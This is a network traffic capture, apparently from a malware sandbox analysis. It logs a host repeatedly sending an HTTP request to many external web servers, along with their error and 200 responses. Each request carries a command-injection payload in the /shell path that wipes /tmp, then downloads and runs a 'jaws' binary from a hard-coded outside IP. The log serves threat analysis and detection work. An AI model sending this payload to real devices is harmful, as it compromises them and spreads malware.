                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            329192.168.2.2347982184.51.27.22280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.295597076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.707089901 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 31 37 35 32 63 33 31 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 37 26 23 34 36 3b 34 34 35 34 35 66 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;e1752c31&#46;1706279527&#46;44545f7</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            330192.168.2.2338056104.71.251.9780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.600425005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.719048977 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 63 30 34 63 36 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 37 26 23 34 36 3b 32 64 35 62 38 32 61 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;97c04c68&#46;1706279527&#46;2d5b82a7</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            331192.168.2.234861823.62.79.23980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.603043079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.724694967 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 61 34 63 30 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 37 26 23 34 36 3b 61 64 30 31 31 31 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;12a4c017&#46;1706279527&#46;ad0111e0</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            332192.168.2.2353902104.232.77.8280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.652853012 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            333192.168.2.2356314184.51.104.1780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.796228886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.992394924 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 65 32 34 38 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 37 26 23 34 36 3b 31 39 31 37 30 63 32 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8ce24817&#46;1706279527&#46;19170c24</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            334192.168.2.234111613.224.63.24380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.797964096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.995754957 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            335192.168.2.233882423.223.101.13080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.813353062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:08.027029037 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 35 35 35 31 30 36 30 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 37 26 23 34 36 3b 35 36 32 64 64 66 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;15551060&#46;1706279527&#46;562ddf82</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            336192.168.2.23365505.152.238.580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.844825029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:08.131337881 CET1046INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:34:23 GMT
                                                            Server: Apache/2.2.22 (Ubuntu)
                                                            Last-Modified: Mon, 22 Jun 2015 08:55:56 GMT
                                                            ETag: "ea0357-2c8-51917712344c9"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 712
                                                            Vary: Accept-Encoding
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 404</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="images/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> ...[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 404</h1> <p>Page Not Found</p> <div id=backlink><a href="#" onclick="window.history.go(-2)" target="_self">Back</a></div> </div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            337192.168.2.2337054103.21.224.21280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.991334915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:08.333772898 CET491INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:02 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            338192.168.2.2357368106.52.83.14880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.993077993 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            339192.168.2.234817838.238.84.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:08.099020958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:08.403314114 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            340192.168.2.2356590179.53.181.4880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:09.544723034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.688091040 CET316INHTTP/1.1 200 OK
                                                            Content-Type:text/html; charset=UTF-8
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:32:09.688529015 CET1286INData Raw: 64 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: d37<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:32:09.688569069 CET1286INData Raw: 29 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c 69
                                                            Data Ascii: ) == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUsh
                                                            Jan 26, 2024 15:32:09.688991070 CET859INData Raw: 65 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f 20
                                                            Data Ascii: else{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            341192.168.2.2348890185.203.117.8680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:09.635936022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.864638090 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            342192.168.2.2355762216.98.4.17580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:09.658200979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.780515909 CET510INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 316
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 65 72 76 69 63 65 64 65 73 6b 2e 74 72 61 64 65 77 65 62 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
